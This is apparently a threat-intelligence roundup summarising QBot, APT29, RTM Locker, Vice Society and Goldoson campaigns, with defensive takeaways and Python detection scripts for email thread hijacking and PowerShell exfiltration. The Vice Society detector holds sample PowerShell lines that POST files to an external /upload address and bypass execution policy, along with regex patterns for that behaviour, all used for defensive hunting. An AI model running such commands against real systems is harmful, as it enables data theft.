QBot Banker Delivered through Business Correspondence

Background:

In early April 2023, an increased volume of malspam using business-email thread hijacking was detected delivering the QBot (QakBot, QuackBot, Pinkslipbot) banking trojan. The observed lures, written in English, German, Italian, and French, targeted various countries, with Germany, Argentina, and Italy the top three in that order. The attackers spoofed the name of a participant in the hijacked conversation to prompt the target to open an attached PDF. The PDF presents a button, a password, and instructions to download a password-protected archive, unpack it, and run the malicious Windows Script File (WSF) inside. Once the user runs it, the WSF deobfuscates an embedded JScript that produces an encoded PowerShell script, which downloads a QBot DLL from a compromised website and runs it with rundll32. QBot steals credentials, profiles systems to identify candidates for further high-value targeting, and steals locally stored emails to feed the next round of thread-hijacking malspam.

Takeaway:

The spoofed sender can be identified in this campaign because the display name copied from earlier messages in the thread appears in the 'From' field next to a fraudulent email address that differs from the real correspondent's. Users should be cautious with password-protected archives, whose contents an email gateway cannot inspect, and with unusual file types such as WSF.
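The mismatch described in the takeaway can be checked mechanically. The following is an added example, not code from the original report: it walks a thread in order, records the display name and address of every participant seen so far, and flags any later message whose From display name is already known but whose address is new. The three messages, names, and domains are constructed sample data.

```python
"""Flag replies whose From display name matches an earlier thread participant
but whose address does not (thread-hijack heuristic).

Added example for the QBot thread-hijacking takeaway; the thread below is
constructed sample data, not a real capture."""
from email import message_from_string
from email.utils import parseaddr, getaddresses

# Constructed thread: two legitimate messages, then a hijacked reply that reuses
# "Anna Schmidt"'s display name with an unrelated sending address.
THREAD = [
"""From: Anna Schmidt <anna.schmidt@example-partner.de>
To: Max Mueller <max.mueller@example-corp.de>
Subject: Rechnung Q1
Message-ID: <1@example-partner.de>

Hi Max, attached is the Q1 invoice.
""",
"""From: Max Mueller <max.mueller@example-corp.de>
To: Anna Schmidt <anna.schmidt@example-partner.de>
Subject: RE: Rechnung Q1
Message-ID: <2@example-corp.de>
In-Reply-To: <1@example-partner.de>

Thanks Anna, received.
""",
"""From: Anna Schmidt <anna.schmidt@mail-relay-7733.example.net>
To: Max Mueller <max.mueller@example-corp.de>
Subject: RE: Rechnung Q1
Message-ID: <3@mail-relay-7733.example.net>
In-Reply-To: <2@example-corp.de>

Please see the attached PDF. Password: 1234
""",
]


def normalize(name):
    """Case-fold and collapse whitespace so 'Anna  Schmidt' == 'anna schmidt'."""
    return " ".join(name.casefold().split())


def find_spoofed_senders(raw_messages):
    """Walk the thread oldest-first. Keep a map of display name -> addresses seen
    in From/To/Cc so far; a later From whose display name is known but whose
    address is not is reported as a likely thread hijack."""
    known = {}      # normalized display name -> set of addresses
    findings = []
    for idx, raw in enumerate(raw_messages):
        msg = message_from_string(raw)
        name, addr = parseaddr(msg.get("From", ""))
        key, addr = normalize(name), addr.casefold()
        if key and key in known and addr not in known[key]:
            findings.append({
                "index": idx,
                "message_id": msg.get("Message-ID"),
                "display_name": name,
                "address": addr,
                "expected": sorted(known[key]),
            })
        # Everyone named in this message becomes a known participant.
        for hdr in ("From", "To", "Cc"):
            for n, a in getaddresses(msg.get_all(hdr, [])):
                if n and a:
                    known.setdefault(normalize(n), set()).add(a.casefold())
    return findings


if __name__ == "__main__":
    for f in find_spoofed_senders(THREAD):
        print(f"message {f['message_id']}: '{f['display_name']}' now sends from "
              f"{f['address']}, previously {f['expected']}")
```

This catches the variant the report describes, where the address changes while the name is reused. It does not catch an attacker who sends from the real correspondent's compromised mailbox, so pair it with sender authentication (SPF/DKIM/DMARC) and attachment controls rather than relying on it alone.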

Espionage Campaign Linked to Russian Intelligence Services

Background:

A new cyberespionage campaign attributed to Russia-sponsored group Cozy Bear (APT29, Nobelium) has been targeting NATO and European Union member countries, and to a lesser extent, Africa. An embassy-themed spearphishing link leads to a compromised website with a custom EnvyScout script utilizing the HTML Smuggling technique. Three new downloaders were unique to this campaign: SnowyAmber, used since October 2022, QuarterRig, used since March 2023, and HalfRig, used since February 2023. The final observed payload was an attack framework beacon, either Cobalt Strike or Brute Ratel.

Takeaway:

Many advanced attacks start with a spearphishing email, so users need basic online hygiene and phishing awareness training. Note that HTML smuggling assembles the payload inside the browser from data carried in the page itself, so controls that only inspect email attachments never see the dropped file; the browser download is the first point at which it exists on disk, and that is where file-type and reputation controls need to apply.


Read The Manual Locker: A Private RaaS Provider

Background:

The Read The Manual (RTM) Locker group is a new ransomware-as-a-service (RaaS) provider with likely connections to the Commonwealth of Independent States. The group operates Windows-targeting ransomware focused on double-extortion attacks on corporate environments. The RTM Locker malware requires the affiliate to have already obtained administrative privileges in the compromised network. To widen the reach of encryption, the locker tries to mount every unmounted partition to an unused drive letter until all 26 letters are in use. RTM Locker uses I/O completion ports so that multiple threads can work on the same file at the same time. The group avoids spreading directly via malspam, marks its builds to discourage premature leaks, and clears the logs and removes the locker once the system is encrypted. Affiliates must follow strict targeting rules and are removed after more than 10 days of unexcused inactivity.

Takeaway:

Multi-threading lets RTM Locker encrypt quickly, leaving little time to interrupt it once it starts. Ransomware is a constantly evolving threat, and the most fundamental defense is a tested backup and restore process that allows recovery without any need to decrypt the affected data; because the locker runs with administrative privileges, keep backup copies offline or otherwise unreachable from the compromised domain. Data theft is containable through segmentation, encrypting data at rest, and limiting the storage of personal and sensitive data.

Vice Society: A Tale of Victim Data Exfiltration via PowerShell, aka Stealing off the Land

Background:

A new PowerShell data exfiltration script was detected in use by the Vice Society ransomware group. The attackers gain access to the target's Domain Controller, which lets them deploy the script to any endpoint in the network. It is launched with the parameter that bypasses PowerShell's Execution Policy and begins by enumerating mounted drives via Windows Management Instrumentation (WMI). It then walks every directory on each mounted volume, skipping names on an ignore list, and uses further keywords and parameters to select which directories and files to exfiltrate via HTTP POST requests to the threat actor's web server. The script implements rate limiting to avoid overwhelming the host's resources.

Takeaway:

Living-off-the-land binaries and scripts (LOLBAS) such as PowerShell and WMI make this activity hard to distinguish from routine administration. Network defenders can check Windows Event Log entries for Event IDs 400 (engine start), 600 (provider start) and 800 (pipeline execution details) in the Windows PowerShell log, and 4103 (module logging) and 4104 (script block logging) in the PowerShell Operational log; 4103 and 4104 are only complete when module and script block logging are enabled by policy. Monitor for HTTP POST events to /upload endpoints on unknown remote HTTP servers, and for HTTP activity directed straight at external IP addresses rather than hostnames. Palo Alto Networks has published a YARA signature to detect this malicious PowerShell exfiltration script.
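The hunting guidance above can be turned into two simple checks. The following is an added example, not Palo Alto Networks' YARA rule and not the actors' script: it scores PowerShell script block and command-line text against the behaviours the report describes (WMI drive enumeration, recursive directory listing, file POSTs, sleep-based pacing, Execution Policy bypass) and scans proxy log lines for POSTs to an /upload path on a bare external IP. All hosts, IP addresses, log lines, and the internal network ranges are constructed for the example.

```python
"""Hunt for the Vice Society PowerShell exfiltration pattern in constructed
PowerShell event text and proxy log lines.

Added example for the takeaway above; indicators are derived from the report's
description, not from the actors' script. All sample data is made up."""
import re
from ipaddress import ip_address, ip_network

# Constructed events: (host, script block or command-line text as it would be
# recorded in Event ID 4104 or a process-creation event).
EVENTS = [
    ("WS01", "Get-ChildItem C:\\Users\\bob\\Documents | Measure-Object"),
    ("WS02", "Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 3 } "
             "| ForEach-Object { Get-ChildItem $_.DeviceID -Recurse -Directory }; "
             "Invoke-WebRequest -Uri http://203.0.113.45/upload -Method POST -InFile $f; "
             "Start-Sleep -Milliseconds 50"),
    ("WS03", "powershell.exe -ExecutionPolicy Bypass -File .\\w1.ps1"),
]

# Constructed proxy log: client method url status
PROXY_LOG = """\
10.1.2.3 POST https://cdn.example.com/api/v1/upload 200
10.1.2.4 GET http://198.51.100.7/index.html 200
10.1.2.5 POST http://203.0.113.45/upload 200
10.1.2.6 POST http://192.0.2.9:8080/upload 200
10.1.2.7 POST http://10.1.9.9/upload 200
"""

# One regex per behaviour named in the report.
INDICATORS = {
    "wmi_drive_enum": re.compile(r"(Get-WmiObject|Get-CimInstance)\s+Win32_LogicalDisk", re.I),
    "recursive_dir_listing": re.compile(r"Get-ChildItem\b.*-Recurse", re.I),
    "http_post_file": re.compile(r"Invoke-(WebRequest|RestMethod)\b.*-Method\s+POST", re.I),
    "rate_limit_sleep": re.compile(r"Start-Sleep\b", re.I),
    "execution_policy_bypass": re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.I),
}

# Assumed internal ranges; replace with the organisation's own allocations.
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

URL_RX = re.compile(r"^(\S+)\s+(\S+)\s+https?://([^/:\s]+)(?::\d+)?(/\S*)?\s+(\d{3})$")


def score_text(text):
    """Names of the indicators present in one script block / command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def suspicious_events(events, min_hits=3):
    """Hosts whose single event trips several indicators at once; a lone
    Get-ChildItem or Start-Sleep is normal admin activity."""
    return [(host, score_text(text)) for host, text in events
            if len(score_text(text)) >= min_hits]


def is_external_ip(host):
    """True only for a literal IP address outside INTERNAL_NETS."""
    try:
        ip = ip_address(host)
    except ValueError:
        return False        # a hostname, not a bare IP
    return not any(ip in net for net in INTERNAL_NETS)


def suspicious_uploads(proxy_log):
    """(client, server) pairs for POSTs to an /upload path on a bare external IP."""
    hits = []
    for line in proxy_log.splitlines():
        m = URL_RX.match(line)
        if not m:
            continue
        client, method, host, path, _status = m.groups()
        if method == "POST" and (path or "/").startswith("/upload") and is_external_ip(host):
            hits.append((client, host))
    return hits


if __name__ == "__main__":
    print("script indicators:", suspicious_events(EVENTS))
    print("upload POSTs to bare external IPs:", suspicious_uploads(PROXY_LOG))
```

Requiring several indicators in one script block keeps the false-positive rate tolerable; a backup job may enumerate drives recursively, but it rarely also POSTs files to a raw IP with sleep-based pacing. Both checks depend on script block logging and proxy logging actually being enabled.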

Goldoson: Privacy-Invasive and Clicker Android Adware Found in Popular Apps in South Korea

Background:

A malicious Android library dubbed Goldoson has been found targeting predominantly South Korean users. McAfee researchers detected it in applications downloaded more than 100 million times from Google Play and 8 million times from ONE store, an app store popular in South Korea. Goldoson collects information about users' locations, connection history, and installed applications. The library either inherits the permissions already granted to the host app or prompts the user for the location permission itself. Additionally, Goldoson generates hidden fraudulent traffic by loading HTML code and injecting it into a customized, hidden WebView, then visiting the URLs recursively.

Takeaway:

All of the identified affected applications have been either updated or removed from the official stores. Users are advised to regularly review the list of installed applications and remove those no longer needed, to watch for signs of covert resource use such as device overheating and faster battery drain, and not to grant unnecessary permissions such as location unless the application needs them for the desired functionality. Keep in mind that a third-party library inherits every permission granted to the app that embeds it, so a permission granted to a legitimate-looking app is also granted to its bundled libraries.
